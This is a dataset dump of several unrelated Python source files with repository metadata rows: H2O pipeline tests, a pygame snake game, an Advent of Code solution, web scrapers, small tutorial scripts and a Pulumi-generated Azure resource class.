        ('pca', H2OPCA(k=2, seed=seed)),
        ('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
    ])
    params = pipeline.get_params()
    assert isinstance(params['standardize'], H2OScaler)
    assert params['standardize__center'] is True
    assert params['standardize__scale'] is False
    assert isinstance(params['pca'], H2OPCA)
    assert params['pca__k'] == 2
    assert params['pca__seed'] == seed
    assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
    assert params['estimator__ntrees'] == 20
    assert params['estimator__max_depth'] == 5
    assert params['estimator__seed'] == seed
    # also the ones that were not set explicitly
    assert params['pca__max_iterations'] is None
    assert params['estimator__learn_rate'] is None
def test_all_params_can_be_set_using_set_params():
    """sklearn set_params() with step__param names reaches every H2O wrapper param."""
    pipeline = Pipeline([
        ('standardize', H2OScaler()),
        ('pca', H2OPCA()),
        ('estimator', H2OGradientBoostingEstimator())
    ])
    pipeline.set_params(
        standardize__center=True,
        standardize__scale=False,
        pca__k=2,
        pca__seed=seed,
        estimator__ntrees=20,
        estimator__max_depth=5,
        estimator__seed=seed
    )
    assert isinstance(pipeline.named_steps.standardize, H2OScaler)
    assert pipeline.named_steps.standardize.center is True
    assert pipeline.named_steps.standardize.scale is False
    assert isinstance(pipeline.named_steps.pca, H2OPCA)
    assert pipeline.named_steps.pca.k == 2
    assert pipeline.named_steps.pca.seed == seed
    assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
    assert pipeline.named_steps.estimator.ntrees == 20
    assert pipeline.named_steps.estimator.max_depth == 5
    assert pipeline.named_steps.estimator.seed == seed
def test_all_params_are_accessible_as_properties():
    """Constructor params are readable as plain attributes on each pipeline step."""
    pipeline = Pipeline([
        ('standardize', H2OScaler(center=True, scale=False)),
        ('pca', H2OPCA(k=2, seed=seed)),
        ('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
    ])
    assert isinstance(pipeline.named_steps.standardize, H2OScaler)
    assert pipeline.named_steps.standardize.center is True
    assert pipeline.named_steps.standardize.scale is False
    assert isinstance(pipeline.named_steps.pca, H2OPCA)
    assert pipeline.named_steps.pca.k == 2
    assert pipeline.named_steps.pca.seed == seed
    assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
    assert pipeline.named_steps.estimator.ntrees == 20
    assert pipeline.named_steps.estimator.max_depth == 5
    assert pipeline.named_steps.estimator.seed == seed
    # also the ones that were not set explicitly
    assert pipeline.named_steps.pca.max_iterations is None
    assert pipeline.named_steps.estimator.learn_rate is None
def test_all_params_can_be_set_as_properties():
    """Params assigned as attributes are reflected back by get_params()."""
    pipeline = Pipeline([
        ('standardize', H2OScaler()),
        ('pca', H2OPCA()),
        ('estimator', H2OGradientBoostingEstimator())
    ])
    pipeline.named_steps.standardize.center = True
    pipeline.named_steps.standardize.scale = False
    pipeline.named_steps.pca.k = 2
    pipeline.named_steps.pca.seed = seed
    pipeline.named_steps.estimator.ntrees = 20
    pipeline.named_steps.estimator.max_depth = 5
    pipeline.named_steps.estimator.seed = seed
    params = pipeline.get_params()
    assert isinstance(params['standardize'], H2OScaler)
    assert params['standardize__center'] is True
    assert params['standardize__scale'] is False
    assert isinstance(params['pca'], H2OPCA)
    assert params['pca__k'] == 2
    assert params['pca__seed'] == seed
    assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
    assert params['estimator__ntrees'] == 20
    assert params['estimator__max_depth'] == 5
    assert params['estimator__seed'] == seed
def test_params_conflicting_with_sklearn_api_are_still_available():
    """H2O params that clash with sklearn method names (e.g. `transform`) stay usable:
    the sklearn method wins on attribute access, while the H2O param is reachable
    via get_params()/set_params() and a trailing-underscore property."""
    pca = H2OPCA()
    assert pca.transform != 'NONE'
    assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
    # conflicting param can be accessed normally using get_params()
    assert pca.get_params()['transform'] == 'NONE'
    # property is accessible directly using a trailing underscore
    assert pca.transform_ == 'NONE'
    pca = H2OPCA(transform='DEMEAN')
    assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
    assert pca.get_params()['transform'] == 'DEMEAN'
    assert pca.transform_ == 'DEMEAN'
    # conflicting param can be modified normally using set_params()
    pca.set_params(transform='DESCALE')
    assert pca.get_params()['transform'] == 'DESCALE'
    assert pca.transform_ == 'DESCALE'
    # conflicting property can be set directly using a trailing underscore
    pca.transform_ = 'NORMALIZE'
    assert pca.get_params()['transform'] == 'NORMALIZE'
    assert pca.transform_ == 'NORMALIZE'
def test_params_are_correctly_passed_to_underlying_transformer():
    """Wrapper params end up in the wrapped H2O transformer's _parms."""
    pca = H2OPCA(seed=seed)
    pca.set_params(transform='DEMEAN', k=3)
    pca.model_id = "dummy"
    # The wrapped estimator is created lazily:
    assert pca.estimator is None
    pca._make_estimator()  # normally done when calling `fit`
    assert pca.estimator
    parms = pca.estimator._parms
    assert parms['seed'] == seed
    assert parms['transform'] == 'DEMEAN'
    assert parms['k'] == 3
    assert parms['model_id'] == "dummy"
    assert parms['max_iterations'] is None
def test_params_are_correctly_passed_to_underlying_estimator():
    """Wrapper params end up in the wrapped H2O estimator's _parms and attributes."""
    estimator = H2OGradientBoostingEstimator(seed=seed)
    estimator.set_params(max_depth=10, learn_rate=0.5)
    estimator.model_id = "dummy"
    # The wrapped estimator is created lazily:
    assert estimator.estimator is None
    estimator._make_estimator()  # normally done when calling `fit`
    real_estimator = estimator.estimator
    assert real_estimator
    parms = real_estimator._parms
    assert real_estimator.seed == parms['seed'] == seed
    assert real_estimator.max_depth == parms['max_depth'] == 10
    assert real_estimator.learn_rate == parms['learn_rate'] == 0.5
    assert real_estimator._id == parms['model_id'] == "dummy"
    assert real_estimator.training_frame == parms['training_frame'] is None
def test_params_are_correctly_passed_to_underlying_automl():
    """Params set on the sklearn wrapper must reach the wrapped H2OAutoML config."""
    wrapper = H2OAutoMLEstimator(seed=seed)
    wrapper.set_params(max_models=5, nfolds=0)
    wrapper.project_name = "dummy"
    assert wrapper.estimator is None
    wrapper._make_estimator()  # normally done when calling `fit`
    aml = wrapper.estimator
    assert aml
    # stopping criteria live in a nested dict of build_control
    criteria = aml.build_control["stopping_criteria"]
    assert criteria["seed"] == seed
    assert criteria["max_models"] == 5
    assert aml.build_control["nfolds"] == 0
    assert aml.build_control["project_name"] == "dummy"
# Run every test function in this module through H2O's pyunit test harness.
pyunit_utils.run_tests([
test_all_params_are_visible_in_get_params,
test_all_params_can_be_set_using_set_params,
test_all_params_are_accessible_as_properties,
test_all_params_can_be_set_as_properties,
test_params_conflicting_with_sklearn_api_are_still_available,
test_params_are_correctly_passed_to_underlying_transformer,
test_params_are_correctly_passed_to_underlying_estimator,
test_params_are_correctly_passed_to_underlying_automl,
])
|
[
"[email protected]"
] | |
e9d1caab6dde00c07ce3832efe253d9348ac4a88
|
940dcf18bb1db19610e29902c78ec703690c4297
|
/pygame/py002.py
|
17a13a71d3e9bdeacc203460516516e052a3e799
|
[] |
no_license
|
Sahil4UI/PythonRegular11-12Dec2020
|
dc20e8d13d191801301d18d5b92f5775fe9c0674
|
0b22b1d8c703ac21a1f02c2b10f327bcb2e96460
|
refs/heads/main
| 2023-02-27T13:00:22.415199 | 2021-01-31T06:57:58 | 2021-01-31T06:57:58 | 318,424,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,076 |
py
|
# Module-level setup for the snake/frog mini-game.
import random
import pygame
import time
from pygame.locals import *
pygame.init()
# Window dimensions and drawing colours (RGB).
H= 600
W=800
gameScreen= pygame.display.set_mode((W,H))
color= (255,255,255)
red = (255 , 0 , 0 )
blue = (0,0,255)
# Size in pixels of one snake segment.
w=30
h=30
# Fire a USEREVENT every 1000 ms to drive the countdown timer.
pygame.time.set_timer(USEREVENT,1000)
frog=pygame.image.load("frog.png")#raw string-path
frog = pygame.transform.scale(frog,(50,50))
# Sound played each time the frog is eaten.
audio = pygame.mixer.Sound("point.wav")
def Score(counter):
    """Draw the current score in the top-left corner of the screen."""
    score_font = pygame.font.SysFont(None, 30)
    # second render() argument enables anti-aliasing
    rendered = score_font.render(f"Score : {counter}", True, blue)
    gameScreen.blit(rendered, (10, 10))
def Snake(snakeList):
    """Draw one red square for every [x, y] segment of the snake body."""
    for segment in snakeList:
        pygame.draw.rect(gameScreen, red, [segment[0], segment[1], w, h])
def Timer(sec):
    """Draw the remaining time near the top-right of the screen."""
    timer_font = pygame.font.SysFont(None, 30)
    # second render() argument enables anti-aliasing
    rendered = timer_font.render(f"Time Left : {sec} seconds", True, blue)
    gameScreen.blit(rendered, (500, 10))
def gameOver():
    """Placeholder for an end-of-game screen; intentionally does nothing yet.

    A "GAME OVER" banner was sketched here but never implemented.
    """
    pass
def main():
    """Run the game loop: steer the snake, bounce off walls, eat frogs, score."""
    dx = 0
    dy = 0
    # drop the frog fully on screen (its sprite is 50x50)
    frogX = random.randint(0, W - 50)
    frogY = random.randint(0, H - 50)
    x = 0
    y = 0
    sec = 20
    counter = 0
    snakeList = []
    snakeLength = 1
    while True:
        gameScreen.fill(color)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
            elif event.type == pygame.USEREVENT:
                # fired once per second by pygame.time.set_timer above
                sec -= 1
            if event.type == pygame.KEYDOWN:
                # arrow keys move along one axis at a time
                if event.key == pygame.K_LEFT:
                    dx, dy = -1, 0
                elif event.key == pygame.K_RIGHT:
                    dx, dy = 1, 0
                elif event.key == pygame.K_UP:
                    dx, dy = 0, -1
                elif event.key == pygame.K_DOWN:
                    dx, dy = 0, 1
        snake = pygame.draw.rect(gameScreen, red, [x, y, w, h])
        snakeList.append([x, y])
        Snake(snakeList)
        frogRect = pygame.Rect([frogX, frogY, 50, 50])
        gameScreen.blit(frog, (frogX, frogY))
        x += dx
        y += dy
        # bounce off every screen edge instead of ending the game
        if x > W - w:
            dx = -1
        elif x < 0:
            dx = 1
        if y > H - h:
            dy = -1
        elif y < 0:
            dy = 1
        Score(counter)
        Timer(sec)
        if sec < 0:
            gameOver()
        # trim the tail so the body keeps its current length
        if snakeLength < len(snakeList):
            del snakeList[0]
        if snake.colliderect(frogRect):
            # frog eaten: respawn it, bump the score, play a sound, grow
            frogX = random.randint(0, W - 50)
            frogY = random.randint(0, H - 50)
            counter += 1
            audio.play()
            snakeLength += 20
        pygame.display.update()
main()
|
[
"[email protected]"
] | |
b540a1018ada187e4e6e105e8d050f936df3061b
|
f416ab3adfb5c641dc84022f918df43985c19a09
|
/problems/advent-of-code/2022/05/sol2.py
|
78cf7599b31d96f7b01fd8ad778ed956290eda79
|
[] |
no_license
|
NicoKNL/coding-problems
|
a4656e8423e8c7f54be1b9015a9502864f0b13a5
|
4c8c8d5da3cdf74aefcfad4e82066c4a4beb8c06
|
refs/heads/master
| 2023-07-26T02:00:35.834440 | 2023-07-11T22:47:13 | 2023-07-11T22:47:13 | 160,269,601 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,530 |
py
|
import sys
def splitInput(lines):
    """Split puzzle input into (stack_count, drawing rows, move lines).

    The input is a crate drawing, a blank separator line, then the move
    instructions.  The last drawing row lists the column numbers, so its
    final token is the stack count; that numbering row itself is dropped.
    """
    separator = lines.index("") if "" in lines else len(lines)
    drawing = [line for line in lines[:separator] if line]
    moves = [line for line in lines[separator:] if line]
    stack_count = int(drawing[-1].split()[-1])
    return stack_count, drawing[:-1], moves
def parseStacks(count, data):
    """Parse the crate drawing into `count` stacks ordered bottom-to-top.

    Crate letters sit at columns 1, 5, 9, ... of each row; a blank at that
    column means the stack is shorter than the current row.  Rows arrive
    top-down, so each stack is reversed at the end.

    Fix: removed a leftover debug `print(row)` that echoed every drawing
    row to stdout.
    """
    stacks = [[] for _ in range(count)]
    for row in data:
        for stack_index, column in enumerate(range(1, len(row), 4)):
            crate = row[column]
            if crate.strip():
                stacks[stack_index].append(crate)
    # rows were visited top-down; flip so index 0 is the bottom crate
    return [stack[::-1] for stack in stacks]
def parseMoves(moves):
    """Rewrite each raw move line in place as [count, from, to].

    Input lines look like "move C from S to T" with 1-based stack numbers;
    the stored from/to indices are converted to 0-based.
    """
    for index, line in enumerate(moves):
        tokens = line.split()
        count, source, target = int(tokens[1]), int(tokens[3]), int(tokens[5])
        moves[index] = [count, source - 1, target - 1]
def execute(moves, stacks):
    """Apply each move, lifting `count` crates at once so their order is kept."""
    for count, source, target in moves:
        lifted = stacks[source][-count:]
        stacks[source] = stacks[source][:-count]
        stacks[target].extend(lifted)
if __name__ == "__main__":
    # strip the trailing newline from every stdin line
    raw_lines = [line[:-1] for line in sys.stdin]
    stack_count, stack_data, moves = splitInput(raw_lines)
    stacks = parseStacks(stack_count, stack_data)
    parseMoves(moves)
    execute(moves, stacks)
    # the answer is the top crate of each stack, a space for empty stacks
    tops = [stack[-1] if stack else " " for stack in stacks]
    print("".join(tops))
|
[
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2
|
ff21f04b692891b13fa2ed49293e5d99fea742db
|
/hunt/scripts/job_spider.py
|
41015307bdb3af0ba459f972c27a7bd7b13714fd
|
[] |
no_license
|
yangby-cryptape/job-hunter
|
3caf49c9290a077661c8e245565132e2a8671c05
|
1b58b2f23ac7d1aba08feaff29692adb8fe58161
|
refs/heads/master
| 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,263 |
py
|
#!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
    """Build browser-like HTTP request headers for the crawler.

    gzip -- when True, also advertise compressed responses via
    Accept-Encoding; by default that header is omitted so the server
    returns plain bytes.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-cn,zh;q=0.5",
        "Accept-Charset": "utf-8;q=0.7,*;q=0.7",
        "Keep-Alive": "115",
        "Connection": "keep-alive",
    }
    if gzip:
        headers["Accept-Encoding"] = "gzip,deflate"
    return headers
# Fetch `url` with browser-like headers and return the page as a PyQuery DOM.
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
except Exception, e:
source = None
print e
# NOTE(review): when the request fails, `source` is None and the decode
# below raises AttributeError -- consider returning None early instead.
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
'''Extract one company's information from its detail-page DOM and return a Company.'''
info_items = dom('.companyInfoItems')
info_trs = info_items('.companyInfoTab tr')
# collect "label: value" table rows into a dict keyed by the label
company_info = {}
for tr in info_trs:
tr = pq(tr)
k = tr('td:eq(0)').text().split(u':')[0]
v = tr('td:eq(1)').text()
company_info[k] = v
# company scale, e.g. "100-499", parsed into a (low, high) pair
scale = company_info.get(u'公司规模')
if scale:
sh = re.search(r'(\d+)-(\d+)', scale)
scale = sh.groups() if sh else (None, None)
else:
scale = (None, None)
####
# merge contact details (also "label: value" pairs) into the same dict
jcs = dom('.jobContact>div>div').find('div') # Job Contact
for jc in jcs:
jc = pq(jc)
jctext = jc.text().split(u':')
if len(jctext) == 2:
k, v = jctext
company_info[k] = v
# build the ORM object; the dict keys below are the Chinese page labels
com = Company()
com.name = info_items('.companyTitle').text()
com.industry = company_info.get(u'公司行业')
com.type = company_info.get(u'公司类型')
com.address = company_info.get(u'公司地址')
com.website = company_info.get(u'公司主页')
com.scale_low, com.scale_high = scale
com.email = None
com.phone_num = None
com.description = dom('.black12 tr:eq(2)').find('td').html()
com.etag = ''
return com
# NOTE(review): the `company` parameter is never used inside this function.
def getJobInfo(dom, company):
'''Extract one job posting's information from its detail-page DOM and return a Job.'''
job_info = {}
# first row holds the job category; '/'-separated values become ','-separated
type_tr = dom('.jobInfoItems tr:eq(0)')
trtext = type_tr.text()
trtext = trtext.split(u':') if trtext else []
if len(trtext) == 2:
k, v = trtext
v = v.replace('/', ',')
job_info[k] = v
# remaining rows are "label: value" cells collected into job_info
trs = dom('.jobInfoItems tr:gt(1)')
for tr in trs:
tr = pq(tr)
tds = tr('td')
for td in tds:
td = pq(td)
tdtext = td.text().split(u':')
if len(tdtext) == 2:
k, v = tdtext
job_info[k] = v
# monthly salary range, e.g. "4000-6000", parsed into (low, high)
salary = job_info.get(u'职位月薪')
if salary:
sh = re.search(r'(\d+)-(\d+)', salary)
salary = sh.groups() if sh else (None, None)
else:
salary = (None, None)
# head-count: keep only the leading number
quantity = job_info.get(u'招聘人数')
if quantity:
sh = re.search(r'(\d+)', quantity)
quantity = sh.group(0) if sh else None
job = Job()
# look up (or lazily create) the Occupational row for this category
occ_type = job_info.get(u'职位类别')
occ = Occupational.query.filter(Occupational.type==occ_type).first()
if not occ:
occ = Occupational()
occ.name = 'FILL'
occ.type = occ_type
db.session.add(occ)
job.occupational = occ
job.type = job_info.get(u'工作性质')
job.exp = job_info.get(u'工作经验')
job.manage_exp = job_info.get(u'管理经验')
job.quantity = quantity
job.degree = job_info.get(u'最低学历')
job.salary_low, job.salary_high = salary
job.description = dom('.jobDes').html()
job.etag = ''
return job
# Scrape one zhaopin.com search-result page (Hangzhou, fixed job categories),
# persist every company/job found, and return (current_page, total_page).
def getPage(page_num):
# throttle requests to be polite to the server
time.sleep(0.6)
dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
table = dom('#contentbox table:eq(1)')
trs = table('tr:gt(0)')
# each result occupies two <tr> rows; only the first of the pair has data
iseven = True
for tr in trs:
if iseven:
tr = pq(tr)
job_title = tr('#dvJobTit').text()
job_url = tr('#dvJobTit a').attr('href')
company_name = tr('#dvCompNM').text()
company_url = tr('#dvCompNM a').attr('href')
# "city - district"; the district part is optional
work_place = tr('td:eq(4)').text().split(' - ')
work_city = work_place[0]
work_area = work_place[1] if len(work_place) > 1 else None
public_date = tr('td:eq(5)').text()
time.sleep(0.6)
# fetch the job detail page and persist company + job in one commit
job_detail_dom = getDomFromUrl(job_url)
company = getCompanyInfo(job_detail_dom)
company.zhaopin_url = company_url
db.session.add(company)
job = getJobInfo(job_detail_dom, company)
job.company = company
job.title = job_title
job.work_city = work_city
job.work_area = work_area
job.public_date = public_date
job.zhaopin_url = job_url
db.session.add(job)
db.session.commit()
print datetime.now()
print 'This is Job %d' % job.id
iseven = not iseven
# pager shows "current/total"; extract both numbers
total_page = dom('.pagehead .num:eq(1)').text()
sh = re.search(r'(\d+)/(\d+)', total_page)
current_page, total_page = sh.groups() if sh else (None, None)
return int(current_page), int(total_page)
# Crawl the first result page to learn the page count, then walk the rest.
def doSpider():
print datetime.now()
print 'Start Get First page'
current_page, total_page = getPage('1')
print 'First page, Done!'
print 'Total page: %d\n' % total_page
for page_num in range(current_page+1, total_page+1):
print datetime.now()
print 'Start get page: [%d]' % page_num
getPage(str(page_num))
print 'page: [%d], Done!\n' % page_num
# Entry point: run the full crawl when executed as a script.
if __name__ == '__main__':
print 'BEGIN TEST'
doSpider()
print 'TEST DONE'
|
[
"[email protected]"
] | |
521ea38335f0c6bebf7ef64a8d68203c32de69dc
|
f97cabce5c91238678e159387f03636d4deb90fb
|
/dajare/crawler_kaishaseikatsu_jp.py
|
c0bb1bb7c7b5cf459ec22cf9603ddf779b6d4b93
|
[] |
no_license
|
vaaaaanquish/dajare-python
|
1daa8b4d31a9e3d5e1336d3b31693c1d491ed814
|
150132cef0333a94c9e286c4241af92c630cd7bd
|
refs/heads/master
| 2022-12-10T08:46:42.827279 | 2020-12-11T03:28:54 | 2020-12-11T03:28:54 | 242,304,312 | 16 | 3 | null | 2022-12-08T03:43:06 | 2020-02-22T08:09:23 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,010 |
py
|
from tqdm import tqdm
from dajare.crawler import Crawler
class CrawlerKaishaseikatsuJp(Crawler):
    """Crawler for dajare posts on archives.kaishaseikatsu.jp."""

    def run(self):
        """Crawl the whole board and dump all records to a JSON file."""
        records = self._run()
        self.output(records, 'dajare_kaishaseikatsu_jp.json')

    def _run(self):
        """Walk the board 100 posts at a time; return one record per row."""
        records = []
        # the board is paged via the `next` offset, 100 rows per request
        for offset in tqdm(range(0, 2200, 100)):
            url = f'http://archives.kaishaseikatsu.jp/cgi-bin/kaisha2/board_r.cgi?type=kaisha_dajare&next={offset}&range=100'
            bs = self.get_bs(url, encoding='shift-jis')
            # dajare rows are the <tr> elements with this background colour
            for row in bs.find_all('tr', bgcolor="#FBFFB2"):
                records.append({
                    'text': row.find('td').text,
                    'url': url,
                    'author': 'kaishaseikatsu',
                    'author_link': 'http://archives.kaishaseikatsu.jp',
                    'mean_score': 0.,
                    'deviation_score': 0.,
                    'category': [],
                    'tag': [],
                    'eval_list': []
                })
        return records
|
[
"[email protected]"
] | |
879086db133bd1ab22783e38d697afc115869d4f
|
71c4a775c81179e920b72bdee87d9af3edfd4d99
|
/01_Sintaxe_Basica/10_dicionario.py
|
9ea3b3c107c7a83db1b023da9899d434b0a3d0f8
|
[] |
no_license
|
frclasso/acate18122018
|
16f4169dbfb0eb8c25e253965642122e6095a211
|
98e4697d4e34c740a537a553b5ae6841159c58f7
|
refs/heads/master
| 2020-04-08T00:54:59.822648 | 2019-01-24T16:55:42 | 2019-01-24T16:55:42 | 158,873,478 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,267 |
py
|
#!/usr/bin/env python3
# Tutorial script demonstrating basic dict operations (create/read/update/delete).
# NOTE: the bare '''...''' strings below are no-op expression statements used
# as Portuguese section labels; they are code, not comments, and are kept as-is.
aluno = {'ID': 1223,
'Nome':'Patricia',
'Idade': 27,
'Curso': 'Sistemas de Informação',
'Turno':'Noturno'
}
# Read individual values by key.
print(f"ID: {aluno['ID']}")
print(f"Nome: {aluno['Nome']}")
print(f"Idade:{aluno['Idade']}")
print()
'''Atualizando valores existentes'''
aluno['Idade'] = 28
print(aluno)
print()
'''Inserindo novo campo'''
aluno['Matrícula'] = 8990020198
print(aluno)
print()
# Using the update() method to change and add several keys at once.
aluno.update({'Turno':'Diurno', 'Sobrenome':'Nunes', 'Telefone':'(48)555-333'})
print(aluno)
print()
'''Deletando items'''
# Three equivalent ways to remove a key: __delitem__, pop(), and del.
aluno.__delitem__('Idade')
print(aluno)
print()
aluno.pop('Turno')
print(aluno)
print()
del aluno['Matrícula']
print(aluno)
print()
'''Apagando todos os dados'''
# aluno.clear()
# print(aluno) # {}
'''Deletando o dicionario em si'''
# del aluno
# print(aluno) # NameError: name 'aluno' is not defined
'''Criando um dicionario vazio'''
meuDic = {}
print(meuDic)
print(type(meuDic))
#
print(f'Tamanho do dicionario: {len(aluno)} items.')
'''Imprimindo um dicionario com as chaves - keys()'''
print(aluno.keys())
'''Imprimindo um dicionario com os valores - values()'''
print(aluno.values())
'''Imprimindo um dicionario com todos os items'''
print(aluno.items())
[
"[email protected]"
] | |
01e192a4c835a3d6ec4c29d6fb66176e51359dcb
|
7c27898a5f85dedf0dbbb12451b6c635861dc197
|
/tornado_overview/chapter03/aiomysql_test.py
|
8c3375ad203593d54c3a67dc4692f73aa301b121
|
[] |
no_license
|
Asunqingwen/Tornado_test_application
|
9323d3289fadf69e7b1e7685da8f631d0e88968f
|
4f3a9cda9fc081a8b83f06934bc480cd597d4ad8
|
refs/heads/master
| 2023-02-18T08:43:58.012236 | 2021-01-21T09:59:57 | 2021-01-21T09:59:57 | 330,935,556 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import asyncio
import aiomysql
from tornado import gen, ioloop
async def go():
    """Connect to MySQL via aiomysql, fetch one row from `message`, print it."""
    pool = await aiomysql.create_pool(
        host='192.168.10.69',
        port=3306,
        user='root',
        password='root',
        db='message',
        charset="utf8",
    )
    async with pool.acquire() as conn, conn.cursor() as cur:
        await cur.execute("SELECT * from message")
        row = await cur.fetchone()
        print(cur.description)
        print(row)
    pool.close()
    await pool.wait_closed()
if __name__ == '__main__':
    # drive the coroutine to completion on tornado's current IOLoop
    ioloop.IOLoop.current().run_sync(go)
|
[
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/PackDist/share/python/PackDistCommon.py
|
0833847cfd1065059cea672b676003e232021674
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,754 |
py
|
"""File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
# Root of this module's exception hierarchy; subclasses carry details in .args.
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return ': '.join([str(arg) for arg in self.args])
# Write "ClassName: args" to the given stream (stderr by default).
# NOTE(review): `file = sys.stderr` is bound at def time, so a later
# reassignment of sys.stderr is not picked up -- confirm that is intended.
def write(self, file = sys.stderr):
print >> file, '%s: %s' % (self.__class__.__name__, self)
class InputError(Error):
    """Raised for errors in the input.

    Carries the offending input expression and an explanatory message,
    exposed through the expression() and message() accessors.
    """

    def __init__(self, expression, message):
        super(InputError, self).__init__(expression, message)

    def expression(self):
        """Return the input expression in which the error occurred."""
        return self.args[0]

    def message(self):
        """Return the explanation of the error."""
        return self.args[1]
class CommandError(Error):
    """Raised when executing a shell command fails.

    args[0] -- the shell command that failed
    args[1] -- combined stderr/stdout of the command
    args[2] -- exit status of the command (may be None)
    """

    def __init__(self, cmd, output, sc = None):
        super(CommandError, self).__init__(cmd, output, sc)
def exitstatus (status):
    """Return the child's exit status if it terminated normally, else None.

    `status` is the raw process status word as returned by os.wait(),
    os.waitpid(), os.system(), the close() method of an os.popen() file
    object, or commands.getstatusoutput().
    """
    # WIFEXITED is false when the child was killed by a signal or stopped
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else None
|
[
"[email protected]"
] | |
b0593bc623f07101fd1c4aac9dd0a4ebc0980eb2
|
955b968d46b4c436be55daf8aa1b8fc8fe402610
|
/ch04/set_window_size.py
|
110459bc02e4e910978194acc115ddfccc6554d7
|
[] |
no_license
|
han-huang/python_selenium
|
1c8159fd1421b1f0e87cb0df20ae4fe82450f879
|
56f9f5e5687cf533c678a1c12e1ecaa4c50a7795
|
refs/heads/master
| 2020-03-09T02:24:48.882279 | 2018-04-07T15:06:18 | 2018-04-07T15:06:18 | 128,535,917 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 265 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Demo: open Gmail in Firefox via Selenium and resize the browser window.
from selenium import webdriver
driver = webdriver.Firefox()
driver.get("https://mail.google.com")
# The set_window_size arguments are in pixels.
print("設定瀏覽器寬480 高800顯示")
driver.set_window_size(480, 800)
# driver.quit()
|
[
"vagrant@LaravelDemoSite"
] |
vagrant@LaravelDemoSite
|
87fa353d224bca02fb3655134746bec120ffc10b
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/compute/v20191201/gallery_application_version.py
|
09d6082a067f10eae575fb0b3681e034d10ed7c2
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 |
Apache-2.0
| 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null |
UTF-8
|
Python
| false | false | 7,987 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['GalleryApplicationVersion']
class GalleryApplicationVersion(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
gallery_application_name: Optional[pulumi.Input[str]] = None,
gallery_application_version_name: Optional[pulumi.Input[str]] = None,
gallery_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
publishing_profile: Optional[pulumi.Input[pulumi.InputType['GalleryApplicationVersionPublishingProfileArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Specifies information about the gallery Application Version that you want to create or update.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] gallery_application_name: The name of the gallery Application Definition in which the Application Version is to be created.
:param pulumi.Input[str] gallery_application_version_name: The name of the gallery Application Version to be created. Needs to follow semantic version name pattern: The allowed characters are digit and period. Digits must be within the range of a 32-bit integer. Format: <MajorVersion>.<MinorVersion>.<Patch>
